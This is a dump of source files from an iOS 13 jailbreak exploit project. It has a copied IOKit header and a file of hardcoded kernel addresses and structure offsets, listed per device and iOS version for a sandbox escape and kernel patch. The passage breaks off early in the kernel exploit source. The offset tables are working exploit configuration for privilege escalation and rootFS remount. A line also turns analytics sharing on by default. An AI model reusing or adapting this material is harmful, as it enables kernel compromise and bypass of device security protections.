    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n\t<key>SchemeUserState</key>\n\t<dict>\n\t\t<key>sock_port.xcscheme_^#shared#^_</key>\n\t\t<dict>\n\t\t\t<key>orderHint</key>\n\t\t\t<integer>0</integer>\n\t\t</dict>\n\t</dict>\n\t<key>SuppressBuildableAutocreation</key>\n\t<dict>\n\t\t<key>82F179EB22DF4ED700231F8C</key>\n\t\t<dict>\n\t\t\t<key>primary</key>\n\t\t\t<true/>\n\t\t</dict>\n\t\t<key>82F17A0322DF4ED800231F8C</key>\n\t\t<dict>\n\t\t\t<key>primary</key>\n\t\t\t<true/>\n\t\t</dict>\n\t\t<key>82F17A0E22DF4ED800231F8C</key>\n\t\t<dict>\n\t\t\t<key>primary</key>\n\t\t\t<true/>\n\t\t</dict>\n\t</dict>\n</dict>\n</plist>\n"
  },
  {
    "path": "Exploits/FreeTheSandbox/IOTypes.h",
    "content": "/*\n * Copyright (c) 1998-2012 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n *\n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n *\n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n *\n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n#ifndef    __IOKIT_IOTYPES_H\n#define __IOKIT_IOTYPES_H\n\n#ifndef IOKIT\n#define IOKIT 1\n#endif /* !IOKIT */\n\n#include <mach/message.h>\n#include <mach/vm_types.h>\n\n#include \"IOReturn.h\"\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n    \n#ifndef    NULL\n#if defined (__cplusplus)\n#define    NULL    0\n#else\n#define NULL ((void *)0)\n#endif\n#endif\n    \n    /*\n     * Simple data types.\n     */\n#include <stdbool.h>\n#define OSTYPES_K64_REV        2\n    \n    typedef unsigned int        UInt;\n    typedef signed int         SInt;\n    \n    \n    typedef UInt32        IOOptionBits;\n    typedef 
SInt32        IOFixed;\n    typedef UInt32        IOVersion;\n    typedef UInt32        IOItemCount;\n    typedef UInt32      IOCacheMode;\n    \n    typedef UInt32         IOByteCount32;\n    typedef UInt64         IOByteCount64;\n    \n    typedef UInt32    IOPhysicalAddress32;\n    typedef UInt64    IOPhysicalAddress64;\n    typedef UInt32    IOPhysicalLength32;\n    typedef UInt64    IOPhysicalLength64;\n    \n#if !defined(__arm__) && !defined(__i386__)\n    typedef mach_vm_address_t    IOVirtualAddress;\n#else\n    typedef vm_address_t        IOVirtualAddress;\n#endif\n    \n#if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL))\n    typedef IOByteCount64        IOByteCount;\n#else\n    typedef IOByteCount32         IOByteCount;\n#endif\n    \n    typedef IOVirtualAddress    IOLogicalAddress;\n    \n#if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL))\n    \n    typedef IOPhysicalAddress64     IOPhysicalAddress;\n    typedef IOPhysicalLength64     IOPhysicalLength;\n#define IOPhysical32( hi, lo )        ((UInt64) lo + ((UInt64)(hi) << 32))\n#define IOPhysSize    64\n    \n#else\n    \n    typedef IOPhysicalAddress32     IOPhysicalAddress;\n    typedef IOPhysicalLength32     IOPhysicalLength;\n#define IOPhysical32( hi, lo )        (lo)\n#define IOPhysSize    32\n    \n#endif\n    \n    \n    typedef struct\n    {\n        IOPhysicalAddress    address;\n        IOByteCount        length;\n    } IOPhysicalRange;\n    \n    typedef struct\n    {\n        IOVirtualAddress    address;\n        IOByteCount        length;\n    } IOVirtualRange;\n    \n#if !defined(__arm__) && !defined(__i386__)\n    typedef IOVirtualRange    IOAddressRange;\n#else\n    typedef struct\n    {\n        mach_vm_address_t    address;\n        mach_vm_size_t    length;\n    } IOAddressRange;\n#endif\n    \n    /*\n     * Map between #defined or enum'd constants and text description.\n     */\n    typedef struct {\n      
  int value;\n        const char *name;\n    } IONamedValue;\n    \n    \n    /*\n     * Memory alignment -- specified as a power of two.\n     */\n    typedef unsigned int    IOAlignment;\n    \n#define IO_NULL_VM_TASK        ((vm_task_t)0)\n    \n    \n    /*\n     * Pull in machine specific stuff.\n     */\n    \n    //#include <IOKit/machine/IOTypes.h>\n    \n#ifndef MACH_KERNEL\n    \n#ifndef __IOKIT_PORTS_DEFINED__\n#define __IOKIT_PORTS_DEFINED__\n    typedef mach_port_t    io_object_t;\n#endif /* __IOKIT_PORTS_DEFINED__ */\n    \n#include <device/device_types.h>\n    \n    typedef io_object_t    io_connect_t;\n    typedef io_object_t    io_enumerator_t;\n    typedef io_object_t    io_iterator_t;\n    typedef io_object_t    io_registry_entry_t;\n    typedef io_object_t    io_service_t;\n    \n#define    IO_OBJECT_NULL    ((io_object_t) 0)\n    \n#endif /* MACH_KERNEL */\n    \n    // IOConnectMapMemory memoryTypes\n    enum {\n        kIODefaultMemoryType    = 0\n    };\n    \n    enum {\n        kIODefaultCache        = 0,\n        kIOInhibitCache        = 1,\n        kIOWriteThruCache        = 2,\n        kIOCopybackCache        = 3,\n        kIOWriteCombineCache    = 4,\n        kIOCopybackInnerCache    = 5,\n        kIOPostedWrite        = 6\n    };\n    \n    // IOMemory mapping options\n    enum {\n        kIOMapAnywhere        = 0x00000001,\n        \n        kIOMapCacheMask        = 0x00000700,\n        kIOMapCacheShift        = 8,\n        kIOMapDefaultCache        = kIODefaultCache       << kIOMapCacheShift,\n        kIOMapInhibitCache        = kIOInhibitCache       << kIOMapCacheShift,\n        kIOMapWriteThruCache    = kIOWriteThruCache     << kIOMapCacheShift,\n        kIOMapCopybackCache        = kIOCopybackCache      << kIOMapCacheShift,\n        kIOMapWriteCombineCache    = kIOWriteCombineCache  << kIOMapCacheShift,\n        kIOMapCopybackInnerCache    = kIOCopybackInnerCache << kIOMapCacheShift,\n        kIOMapPostedWrite        = 
kIOPostedWrite    << kIOMapCacheShift,\n        \n        kIOMapUserOptionsMask    = 0x00000fff,\n        \n        kIOMapReadOnly        = 0x00001000,\n        \n        kIOMapStatic        = 0x01000000,\n        kIOMapReference        = 0x02000000,\n        kIOMapUnique        = 0x04000000,\n        kIOMapPrefault        = 0x10000000,\n        kIOMapOverwrite     = 0x20000000\n    };\n    \n    /*! @enum Scale Factors\n     @discussion Used when a scale_factor parameter is required to define a unit of time.\n     @constant kNanosecondScale Scale factor for nanosecond based times.\n     @constant kMicrosecondScale Scale factor for microsecond based times.\n     @constant kMillisecondScale Scale factor for millisecond based times.\n     @constant kTickScale Scale factor for the standard (100Hz) tick.\n     @constant kSecondScale Scale factor for second based times. */\n    \n    enum {\n        kNanosecondScale  = 1,\n        kMicrosecondScale = 1000,\n        kMillisecondScale = 1000 * 1000,\n        kSecondScale      = 1000 * 1000 * 1000,\n        kTickScale        = (kSecondScale / 100)\n    };\n    \n    enum {\n        kIOConnectMethodVarOutputSize = -3\n    };\n    \n    /* compatibility types */\n    \n    \n    typedef unsigned int IODeviceNumber;\n    \n    \n#ifdef __cplusplus\n}\n#endif\n\n#endif /* ! __IOKIT_IOTYPES_H */\n"
  },
  {
    "path": "Exploits/FreeTheSandbox/freethesandbox.h",
    "content": "//\n//  freethesandbox.h\n//  Blizzard Jailbreak\n//\n//  Created by GeoSn0w on 11/20/20.\n//  Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#ifndef freethesandbox_h\n#define freethesandbox_h\nvoid iOS13_exploit_init(void);\n\n#endif /* freethesandbox_h */\n"
  },
  {
    "path": "Exploits/FreeTheSandbox/ios13_change_offsets.m",
    "content": "//\n//  ios13_change_offsets.c\n//  ios13_app1\n//\n//  Created by bb on 1/25/20.\n//  Copyright © 2020 bb. All rights reserved.\n//\n\n\n#include <stdio.h>\n#include <setjmp.h>\n#include <stdlib.h>\n#include <sys/mman.h>\n#include <sys/sysctl.h>\n#include <sys/utsname.h>\n#include <mach/mach.h>\n#include <mach/thread_act.h>\n#include <mach/semaphore.h>\n#include <mach/mach_traps.h>\n#include <mach/thread_status.h>\n#include <pthread/pthread.h>\n#include <IOSurface/IOSurfaceRef.h>\n#include \"IOKitLib.h\"\n#include <dirent.h>\n#include <mach-o/dyld.h>\n#include <sys/stat.h>\n#import <Foundation/Foundation.h>\n#import <UIKit/UIKit.h>\n\n#pragma mark --- External API\n//set share_analytics = false to disable analytics sharing\nshare_analytics = true;\n\n#define SYSTEM_VERSION_EQUAL_TO(v)                  ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedSame)\n#define SYSTEM_VERSION_GREATER_THAN(v)              ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedDescending)\n#define SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(v)  ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedAscending)\n#define SYSTEM_VERSION_LESS_THAN(v)                 ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedAscending)\n#define SYSTEM_VERSION_LESS_THAN_OR_EQUAL_TO(v)     ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedDescending)\n\nbool check_if_iOS_version_equal_to(const char *cmpto_version){\n    CFStringRef cfstrwrap = CFStringCreateWithCString(kCFAllocatorDefault, cmpto_version, kCFStringEncodingUTF8);\n    \n    if (SYSTEM_VERSION_EQUAL_TO((__bridge NSString * _Nonnull)(cfstrwrap))) {\n        return true;\n    }\n    \n    CFRelease(cfstrwrap);\n    return false;\n}\n\nbool check_if_iOS_version_greater_than_or_equal_to(const char *cmpto_version){\n    CFStringRef 
cfstrwrap = CFStringCreateWithCString(kCFAllocatorDefault, cmpto_version, kCFStringEncodingUTF8);\n    \n    if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO((__bridge NSString * _Nonnull)(cfstrwrap))) {\n        return true;\n    }\n    \n    CFRelease(cfstrwrap);\n    return false;\n}\n\nbool check_if_iOS_version_less_then(const char *cmpto_version){\n    CFStringRef cfstrwrap = CFStringCreateWithCString(kCFAllocatorDefault, cmpto_version, kCFStringEncodingUTF8);\n    \n    if (SYSTEM_VERSION_LESS_THAN((__bridge NSString * _Nonnull)(cfstrwrap))) {\n        return true;\n    }\n    \n    CFRelease(cfstrwrap);\n    return false;\n}\n\nbool check_if_its_PAC_device(){\n#if __arm64e__\n    return true;\n#endif\n    return false;\n}\n\nbool check_if_amfid_has_entitParser(){\n    if(check_if_iOS_version_greater_than_or_equal_to(\"13.5\"))\n        return true;\n    return false;\n}\n\nchar *_cur_deviceModel = NULL;\nchar *get_current_deviceModel(){\n    if(_cur_deviceModel)\n        return _cur_deviceModel;\n    struct utsname systemInfo;\n    uname(&systemInfo);\n    NSString* code = [NSString stringWithCString:systemInfo.machine\n                                        encoding:NSUTF8StringEncoding];\n    static NSDictionary* deviceNamesByCode = nil;\n    if (!deviceNamesByCode) {\n        deviceNamesByCode = @{@\"i386\"      : @\"Simulator\",\n                              @\"x86_64\"    : @\"Simulator\",\n                              @\"iPod1,1\"   : @\"iPod Touch\",        // (Original)\n                              @\"iPod2,1\"   : @\"iPod Touch\",        // (Second Generation)\n                              @\"iPod3,1\"   : @\"iPod Touch\",        // (Third Generation)\n                              @\"iPod4,1\"   : @\"iPod Touch\",        // (Fourth Generation)\n                              @\"iPod7,1\"   : @\"iPod Touch\",        // (6th Generation)\n                              @\"iPhone1,1\" : @\"iPhone\",            // (Original)\n                             
 @\"iPhone1,2\" : @\"iPhone\",            // (3G)\n                              @\"iPhone2,1\" : @\"iPhone\",            // (3GS)\n                              @\"iPad1,1\"   : @\"iPad\",              // (Original)\n                              @\"iPad2,1\"   : @\"iPad 2\",            //\n                              @\"iPad3,1\"   : @\"iPad\",              // (3rd Generation)\n                              @\"iPhone3,1\" : @\"iPhone 4\",          // (GSM)\n                              @\"iPhone3,3\" : @\"iPhone 4\",          // (CDMA/Verizon/Sprint)\n                              @\"iPhone4,1\" : @\"iPhone 4S\",         //\n                              @\"iPhone5,1\" : @\"iPhone 5\",          // (model A1428, AT&T/Canada)\n                              @\"iPhone5,2\" : @\"iPhone 5\",          // (model A1429, everything else)\n                              @\"iPad3,4\"   : @\"iPad\",              // (4th Generation)\n                              @\"iPad2,5\"   : @\"iPad Mini\",         // (Original)\n                              @\"iPhone5,3\" : @\"iPhone 5c\",         // (model A1456, A1532 | GSM)\n                              @\"iPhone5,4\" : @\"iPhone 5c\",         // (model A1507, A1516, A1526 (China), A1529 | Global)\n                              @\"iPhone6,1\" : @\"iPhone 5s\",         // (model A1433, A1533 | GSM)\n                              @\"iPhone6,2\" : @\"iPhone 5s\",         // (model A1457, A1518, A1528 (China), A1530 | Global)\n                              @\"iPhone7,1\" : @\"iPhone 6 Plus\",     //\n                              @\"iPhone7,2\" : @\"iPhone 6\",          //\n                              @\"iPhone8,1\" : @\"iPhone 6S\",         //\n                              @\"iPhone8,2\" : @\"iPhone 6S Plus\",    //\n                              @\"iPhone8,4\" : @\"iPhone SE\",         //\n                              @\"iPhone9,1\" : @\"iPhone 7\",          //\n                              @\"iPhone9,3\" : @\"iPhone 7\",       
   //\n                              @\"iPhone9,2\" : @\"iPhone 7 Plus\",     //\n                              @\"iPhone9,4\" : @\"iPhone 7 Plus\",     //\n                              @\"iPhone10,1\": @\"iPhone 8\",          // CDMA\n                              @\"iPhone10,4\": @\"iPhone 8\",          // GSM\n                              @\"iPhone10,2\": @\"iPhone 8 Plus\",     // CDMA\n                              @\"iPhone10,5\": @\"iPhone 8 Plus\",     // GSM\n                              @\"iPhone10,3\": @\"iPhone X\",          // CDMA\n                              @\"iPhone10,6\": @\"iPhone X\",          // GSM\n                              @\"iPhone11,2\": @\"iPhone XS\",         //\n                              @\"iPhone11,4\": @\"iPhone XS Max\",     //\n                              @\"iPhone11,6\": @\"iPhone XS Max\",     // China\n                              @\"iPhone11,8\": @\"iPhone XR\",         //\n                              @\"iPhone12,1\": @\"iPhone 11\",         //\n                              @\"iPhone12,3\": @\"iPhone 11 Pro\",     //\n                              @\"iPhone12,5\": @\"iPhone 11 Pro Max\", //\n                              \n                              @\"iPad4,1\"   : @\"iPad Air\",          // 5th Generation iPad (iPad Air) - Wifi\n                              @\"iPad4,2\"   : @\"iPad Air\",          // 5th Generation iPad (iPad Air) - Cellular\n                              @\"iPad4,4\"   : @\"iPad Mini\",         // (2nd Generation iPad Mini - Wifi)\n                              @\"iPad4,5\"   : @\"iPad Mini\",         // (2nd Generation iPad Mini - Cellular)\n                              @\"iPad4,7\"   : @\"iPad Mini\",         // (3rd Generation iPad Mini - Wifi (model A1599))\n                              @\"iPad6,7\"   : @\"iPad Pro (12.9\\\")\", // iPad Pro 12.9 inches - (model A1584)\n                              @\"iPad6,8\"   : @\"iPad Pro (12.9\\\")\", // iPad Pro 12.9 inches - (model 
A1652)\n                              @\"iPad6,3\"   : @\"iPad Pro (9.7\\\")\",  // iPad Pro 9.7 inches - (model A1673)\n                              @\"iPad6,4\"   : @\"iPad Pro (9.7\\\")\"   // iPad Pro 9.7 inches - (models A1674 and A1675)\n        };\n    }\n    NSString* deviceName = [deviceNamesByCode objectForKey:code];\n    if (!deviceName) {\n        // Not found on database. At least guess main device type from string contents:\n        \n        if ([code rangeOfString:@\"iPod\"].location != NSNotFound) {\n            deviceName = @\"iPod Touch\";\n        }\n        else if([code rangeOfString:@\"iPad\"].location != NSNotFound) {\n            deviceName = @\"iPad\";\n        }\n        else if([code rangeOfString:@\"iPhone\"].location != NSNotFound){\n            deviceName = @\"iPhone\";\n        }\n        else {\n            deviceName = @\"Unknown\";\n        }\n    }\n    _cur_deviceModel = strdup([deviceName UTF8String]);\n    return _cur_deviceModel;\n}\n\n\n#pragma mark --- Hardcoded values\n\n// HARDCODED addresses used in kernel\nuint64_t HARDCODED_infoleak_addr = 0; // vtable of IOSurface\nuint64_t HARDCODED_allproc = 0; // via IDA search pgrp_add : pgrp is dead adding process\nuint64_t HARDCODED_kernel_map = 0; // via jtool2\n\n// HARDCODED offsets used in kernel\nuint32_t OFFSET_bsd_info_pid = 0x68; // +0x68:  bsd_info->pid\nuint32_t OFFSET_bsd_info_task = 0x10; // +0x10:  bsd_info->task\nuint32_t OFFSET_task_itk_task_access = 0x2F8; // +0x2F8:  task->itk_task_access (ios13.x)\nuint32_t OFFSET_task_itk_registered = 0x308; // +0x308:  task->itk_registered (ios13.x)\nuint32_t OFFSET_task_t_flags; // for TF_PLATFORM Patch\n\n// HARDCODED zone index used in kernel\nuint32_t zone_index_ipc_ports = 42;\nuint32_t zone_index_tasks = 58;\n\n// --- following addr/offsets are post-exp\n\n// HARDCODED addresses used in kernel for remount rootFS\nuint64_t HARDCODED_jnodehash_mask = 0;\nuint64_t HARDCODED_jjnodehashtbl = 0;\nuint32_t 
OFFSET_bsd_info_p_fd = 0x108; // pac: 0x108\nuint32_t OFFSET_fileproc_f_fglob = 0x10; // pac: 0x10 // for use of find_vnode_with_path\nuint32_t OFFSET_fileglob_fg_data = 0x38; // pac: 0x38 // for use of find_vnode_with_path\nuint32_t OFFSET_vnode_v_data = 0xE0; // pac: 0xE0 find the snapshot stru off a vnode, used in patch_snapshot_vnode\nuint32_t OFFSET_vnode_v_mount = 0xD8; // pac: 0xD8 // for find the mount structure off a vnode\nuint32_t OFFSET_mount_mnt_flag = 0x70; // pac: 0x70 // for remove read-only flag on mount stru\n\n#pragma mark --- Check device\n\nbool check_device_compatibility(){\n    extern int Apply_hardcoded_addresses_and_offsets(void);\n    \n    if(Apply_hardcoded_addresses_and_offsets() == 0)\n        return true;\n    return false;\n}\n\nint Apply_hardcoded_addresses_and_offsets(){\n    \n    if(!strcmp(get_current_deviceModel(), \"iPhone X\")){\n        int apply_to_iPhone_X(void);\n        return apply_to_iPhone_X();\n    }\n    else if(!strcmp(get_current_deviceModel(), \"iPhone 11 Pro Max\")){\n        int apply_to_iPhone_11_pro_max(void);\n        return apply_to_iPhone_11_pro_max();\n    }else if(!strcmp(get_current_deviceModel(), \"iPhone 7 Plus\")){\n        int apply_to_iPhone_7_plus(void);\n        return apply_to_iPhone_7_plus();\n    }\n    else if(!strcmp(get_current_deviceModel(), \"iPhone XS\")){\n        int apply_to_iPhone_XS(void);\n        return apply_to_iPhone_XS();\n    }\n    \n    \n    (printf)(\"Execution pause: Not found offsets set for current device(model: %s)\\n\", get_current_deviceModel());\n    return -1;\n}\n\n#pragma mark --- iPhone X\n\nint apply_to_iPhone_X(){\n    \n    OFFSET_task_t_flags = 0x3B8; // take from iphoneX 13.2.x, think it remains the same in all non-pac device\n    \n    if(check_if_iOS_version_greater_than_or_equal_to(\"13.2\") && check_if_iOS_version_less_then(\"13.3\")){\n        // iOS 13.2.x on iPhone X\n        HARDCODED_infoleak_addr = 0xfffffff007a10fb0;\n        HARDCODED_allproc = 
0xFFFFFFF0091EAC50;\n        HARDCODED_kernel_map = 0xfffffff007905658;\n    }\n    else if(check_if_iOS_version_equal_to(\"13.3\")){\n        // iOS 13.3 on iPhone X\n        HARDCODED_infoleak_addr = 0xFFFFFFF007A150D0;\n        HARDCODED_allproc = 0xFFFFFFF0091EEC30;\n        HARDCODED_kernel_map = 0xfffffff007909658;\n        \n        HARDCODED_jnodehash_mask = 0xFFFFFFF009225CD4;\n        HARDCODED_jjnodehashtbl = 0xFFFFFFF009225CD8;\n        \n    }\n    else if(check_if_iOS_version_greater_than_or_equal_to(\"13.3.1\") && check_if_iOS_version_less_then(\"13.3.2\")){\n        // iOS 13.3.1 on iPhone X\n        HARDCODED_infoleak_addr = 0xFFFFFFF007A21150;\n        HARDCODED_allproc = 0xFFFFFFF009232C30;\n        HARDCODED_kernel_map = 0xfffffff007915658;\n        \n        HARDCODED_jnodehash_mask = 0xFFFFFFF009269CD4;\n        HARDCODED_jjnodehashtbl = 0xFFFFFFF009269CD8;\n        \n    }\n    else if(check_if_iOS_version_greater_than_or_equal_to(\"13.4\") && check_if_iOS_version_less_then(\"13.4.2\")){\n        \n        zone_index_tasks = 60;\n        \n        // iOS 13.4\n        HARDCODED_infoleak_addr = 0xFFFFFFF007A5E7D8;\n        HARDCODED_allproc = 0xFFFFFFF00926FC60;\n        HARDCODED_kernel_map = 0xFFFFFFF00794D6A8;\n    }\n    else if(check_if_iOS_version_equal_to(\"13.4.5\")){\n        \n        zone_index_tasks = 60;\n        \n        // iOS 13.4.5 beta, 后来改名为 13.5 beta\n        HARDCODED_infoleak_addr = 0xFFFFFFF007A5E7D8;\n        HARDCODED_allproc = 0xFFFFFFF00926FC60;\n        HARDCODED_kernel_map = 0xFFFFFFF00794D6A8;\n    }\n    else if(check_if_iOS_version_greater_than_or_equal_to(\"13.5\") && check_if_iOS_version_less_then(\"13.5.2\")){\n        \n        zone_index_tasks = 60;\n        \n        // iOS 13.5/13.5.1\n        HARDCODED_infoleak_addr = 0xFFFFFFF007A427E8;\n        HARDCODED_allproc = 0xFFFFFFF0092544B0;\n        HARDCODED_kernel_map = 0xfffffff0079316a8;\n    }\n    else 
if(check_if_iOS_version_greater_than_or_equal_to(\"13.6\") && check_if_iOS_version_less_then(\"13.6.2\")){\n        \n        zone_index_tasks = 60;\n        \n        // iOS 13.6/13.6.1\n        HARDCODED_infoleak_addr = 0xFFFFFFF007A427F8;\n        HARDCODED_allproc = 0xFFFFFFF009257AB0;\n        HARDCODED_kernel_map = 0xfffffff0079316c0;\n    }\n    else if(check_if_iOS_version_greater_than_or_equal_to(\"13.7\") && check_if_iOS_version_less_then(\"13.7.1\")){\n        \n        zone_index_tasks = 60;\n        \n        // iOS 13.7\n        HARDCODED_infoleak_addr = 0xFFFFFFF007A427F8;\n        HARDCODED_allproc = 0xFFFFFFF009257AB0;\n        HARDCODED_kernel_map = 0xfffffff0079316c0;\n    }\n    else{\n        printf(\"Execution pause: require update hardcoded addresses and offsets\\n\");\n        return -1;\n    }\n    \n    return 0;\n}\n\n#pragma mark --- iPhone 11 Pro Max\n\nint apply_to_iPhone_11_pro_max(){\n    \n    OFFSET_task_t_flags = 0x3C0; // confirmed remains the same in iphonexs max(13.1.x ~ 13.3.x)\n    \n    // zone index changes likely can apply to all PAC device\n    zone_index_tasks = 57;\n    \n    if(check_if_iOS_version_greater_than_or_equal_to(\"13.3.1\") && check_if_iOS_version_less_then(\"13.3.2\")){\n        \n        // iOS 13.3.1\n        HARDCODED_infoleak_addr = 0xFFFFFFF0079F4760;\n        HARDCODED_allproc = 0xFFFFFFF00945C940;\n        HARDCODED_kernel_map = 0xfffffff0078d1768;\n    }\n    else if(check_if_iOS_version_greater_than_or_equal_to(\"13.4\") && check_if_iOS_version_less_then(\"13.4.2\")){\n        \n        zone_index_tasks = 59;\n        \n        // iOS 13.4\n        HARDCODED_infoleak_addr = 0xFFFFFFF007A30C78;\n        HARDCODED_allproc = 0xFFFFFFF0094A5970;\n        HARDCODED_kernel_map = 0xFFFFFFF007909678;\n    }\n    else if(check_if_iOS_version_greater_than_or_equal_to(\"13.5\") && check_if_iOS_version_less_then(\"13.5.2\")){\n        \n        zone_index_tasks = 59;\n        \n        // iOS 13.5/13.5.1\n     
   HARDCODED_infoleak_addr = 0xFFFFFFF007A10C88;\n        HARDCODED_allproc = 0xFFFFFFF0094821C0;\n        HARDCODED_kernel_map = 0xfffffff0078e9678;\n    }\n    else if(check_if_iOS_version_greater_than_or_equal_to(\"13.6\") && check_if_iOS_version_less_then(\"13.6.2\")){\n        \n        zone_index_tasks = 59;\n        \n        // iOS 13.6/13.6.1\n        HARDCODED_infoleak_addr = 0xFFFFFFF007A18C98;\n        HARDCODED_allproc = 0xFFFFFFF009481800;\n        HARDCODED_kernel_map = 0xfffffff0078f1690;\n    }\n    else if(check_if_iOS_version_greater_than_or_equal_to(\"13.7\") && check_if_iOS_version_less_then(\"13.7.1\")){\n        zone_index_tasks = 59;\n        \n        // iOS 13.7\n        HARDCODED_infoleak_addr = 0xFFFFFFF007A18C98;\n        HARDCODED_allproc = 0xFFFFFFF009481800;\n        HARDCODED_kernel_map = 0xfffffff0078f1690;\n    }\n    else{\n        printf(\"Execution pause: require update hardcoded addresses and offsets\\n\");\n        return -1;\n    }\n    \n    return 0;\n}\n\nint apply_to_iPhone_7_plus(){\n    \n    OFFSET_task_t_flags = 0x3B8; // confirmed remains the same in iphonexs max(13.1.x ~ 13.3.x)\n    \n    // zone index changes likely can apply to all PAC device\n    zone_index_tasks = 58;\n    \n    if(check_if_iOS_version_greater_than_or_equal_to(\"13.4.1\") && check_if_iOS_version_less_then(\"13.3.2\")){\n        \n        // iOS 13.3.1\n        HARDCODED_infoleak_addr = 0xfffffff006dc4f38;\n        HARDCODED_allproc = 0xFFFFFFF007767860;\n        HARDCODED_kernel_map = 0xfffffff0070d0aa8;\n    }\n    else if(check_if_iOS_version_greater_than_or_equal_to(\"13.6\") && check_if_iOS_version_less_then(\"13.6.2\")){\n         \n        // iOS 13.6/13.6.1\n        HARDCODED_infoleak_addr = 0xFFFFFFF006DBCEF8;\n        HARDCODED_allproc = 0xFFFFFFF007770FA0;\n        HARDCODED_kernel_map = 0xFFFFFFF0070D0A90;\n    }\n    else{\n        printf(\"Execution pause: require update hardcoded addresses and offsets\\n\");\n        return -1;\n 
   }\n    \n    return 0;\n}\n\nint apply_to_iPhone_XS(){\n    \n    OFFSET_task_t_flags = 0x3C0;\n    \n    // zone index changes likely can apply to all PAC device\n    zone_index_tasks = 57;\n    \n    if(check_if_iOS_version_greater_than_or_equal_to(\"13.5\") && check_if_iOS_version_less_then(\"13.5.2\")){\n        \n        zone_index_tasks = 59;\n        \n        // iOS 13.5/13.5.1\n        HARDCODED_infoleak_addr = 0xFFFFFFF007917A18;\n        HARDCODED_allproc = 0xFFFFFFF0093AB1B0;\n        HARDCODED_kernel_map = 0xfffffff00789d678;\n    }\n    else if(check_if_iOS_version_greater_than_or_equal_to(\"13.6\") && check_if_iOS_version_less_then(\"13.6.2\")){\n        \n        zone_index_tasks = 59;\n        \n        // iOS 13.6/13.6.1\n        HARDCODED_infoleak_addr = 0xFFFFFFF00791FA18;\n        HARDCODED_allproc = 0xFFFFFFF0093AA7F0;\n        HARDCODED_kernel_map = 0xfffffff0078a5690;\n    }\n    else if(check_if_iOS_version_greater_than_or_equal_to(\"13.7\") && check_if_iOS_version_less_then(\"13.7.1\")){\n        zone_index_tasks = 59;\n        \n        // iOS 13.7\n        HARDCODED_infoleak_addr = 0xFFFFFFF00791FA18;\n        HARDCODED_allproc = 0xFFFFFFF0093AA7F0;\n        HARDCODED_kernel_map = 0xfffffff0078a5690;\n    }\n    else{\n        printf(\"Execution pause: require update hardcoded addresses and offsets\\n\");\n        return -1;\n    }\n    \n    return 0;\n}\n"
  },
  {
    "path": "Exploits/FreeTheSandbox/ios13_kernel_universal.c",
    "content": "//\n//  ios13_kernel_universal.c\n//  ios13_app1\n//\n//  Created by bb on 1/12/20.\n//  Copyright © 2020 bb. All rights reserved.\n//\n\n// Update* For 13.4/13.4.1 Support\n// Update* For 13.6/13.6.1 Support\n// Update* For 13.7 Support\n\n#include <stdio.h>\n#include <setjmp.h>\n#include <stdlib.h>\n#include <sys/mman.h>\n#include <sys/sysctl.h>\n#include <mach/mach.h>\n#include <mach/thread_act.h>\n#include <mach/semaphore.h>\n#include <mach/mach_traps.h>\n#include <mach/thread_status.h>\n#include <pthread/pthread.h>\n#include <IOSurface/IOSurfaceRef.h>\n#include <copyfile.h>\n#include <dirent.h>\n#include <mach-o/dyld.h>\n#include <sys/stat.h>\n#include <dlfcn.h>\n#include \"IOKitLib.h\"\n#include <mach-o/nlist.h>\n#include <mach-o/getsect.h>\n\n//Share analytics\nextern bool share_analytics;\n\n// HARDCODED addresses used in kernel\nextern uint64_t HARDCODED_infoleak_addr;\nextern uint64_t HARDCODED_allproc;\nextern uint64_t HARDCODED_kernel_map;\n\n// HARDCODED offsets used in kernel\nextern uint32_t OFFSET_bsd_info_pid;\nextern uint32_t OFFSET_bsd_info_task;\nextern uint32_t OFFSET_task_itk_task_access;\nextern uint32_t OFFSET_task_itk_registered;\nextern uint32_t OFFSET_task_t_flags;\n\n// HARDCODED zone index used in kernel\nextern uint32_t zone_index_ipc_ports;\nextern uint32_t zone_index_tasks;\n\nextern void Apply_hardcoded_addresses_and_offsets(void);\n\njmp_buf reattempt_jmpb;\n\n#define IO_BITS_PORT_INFO   0x0000f000\n#define IO_BITS_KOTYPE      0x00000fff\n#define IO_BITS_KOBJECT     0x00000800\n#define IO_BITS_OTYPE       0x7fff0000\n#define IO_BITS_ACTIVE      0x80000000\n\n#define IKOT_NONE               0\n#define IKOT_THREAD             1\n#define IKOT_TASK               2\n#define IKOT_HOST               3\n#define IKOT_HOST_PRIV          4\n#define IKOT_PROCESSOR          5\n#define IKOT_PSET               6\n#define IKOT_PSET_NAME          7\n#define IKOT_TIMER              8\n#define 